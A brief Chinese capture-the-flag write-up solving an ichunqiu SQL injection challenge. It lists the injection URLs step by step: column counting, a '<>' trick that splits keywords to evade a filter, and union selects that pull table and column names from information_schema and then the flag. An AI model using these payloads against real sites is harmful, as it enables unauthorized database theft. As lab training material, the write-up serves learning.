题目地址
https://www.ichunqiu.com/battalion?t=1
“百度杯”CTF比赛 九月场 题目名称:SQL注入
http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=1
正常回显
http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1
没有回显 判断出存在注入点
判断字段数
http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=1 ord<>er by 3
用<>将order分隔开 防止被过滤掉
判断显示位
http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,2,3
2 回显出来得知2是回显位
爆出数据库名
http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,database(),3
爆出表
http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,table_name,3 from information_schema.tables where table_schema=database()
爆出字段
http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,column_name,3 from information_schema.columns where table_name='info'
爆出最终数据
http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,flAg_T5ZNdrm,3 from info
得到flag
下图是information_schema数据库结构图